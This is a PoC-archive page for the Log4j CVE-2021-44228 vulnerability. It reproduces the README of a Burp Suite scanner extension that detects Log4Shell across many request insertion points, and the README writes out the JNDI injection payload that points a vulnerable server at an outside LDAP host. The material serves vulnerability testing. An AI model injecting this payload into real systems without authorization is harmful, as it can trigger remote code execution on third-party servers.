关联漏洞
标题:Apache Log4j 代码问题漏洞 (CVE-2021-44228)Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046
介绍
# Log4j-HammerTime
This Burp Suite Active Scanner extension validates exploitation of the Apache Log4j CVE-2021-44228 and CVE-2021-45046 vulnerabilities.
This extension uses the Burp Collaborator to verify the issue.
## Usage
* Enable this extension
* Launch an Active Scan on a specific target
if you want to run only checks from this module, you can import the [extensions-only.json](./extensions-only.json) profile and select it as the Active Scan Profile.
## Details
During an Active Scan, the following insertion points are tried in this extension:
* HEADER
* PARAM_NAME_BODY
* PARAM_BODY
* PARAM_NAME_URL
* PARAM_URL
* PARAM_COOKIE
* PARAM_JSON
* ENTIRE_BODY
At each insertion point, the request is injected with the following payload:
```${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}```
Moreover, this extension adds many headers which are enabled in [headers](./resources/headers) (uncommented lines).
These headers are injected one-by-one in a seperate request.
## Legal Disclaimer
This project is made for educational and ethical testing purposes only. Usage of Log4Shell-active-scanner for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
## License
The project is licensed under MIT License.
## Authors
* Freskimo
文件快照
[4.0K] /data/pocs/b90b1f3f4c7c1e8bb4c9223d91e31265f249cd1c
├── [ 601] build.gradle
├── [ 49K] extensions-only.json
├── [1.1K] LICENSE
├── [1.4K] README.md
├── [4.0K] resources
│ └── [ 18K] headers
├── [ 38] settings.gradle
└── [4.0K] src
└── [4.0K] burp
├── [ 10K] BurpExtender.java
├── [2.1K] CustomScanIssue.java
├── [7.0K] InteractionServer.java
└── [ 770] TimedRequestResponse.java
3 directories, 10 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。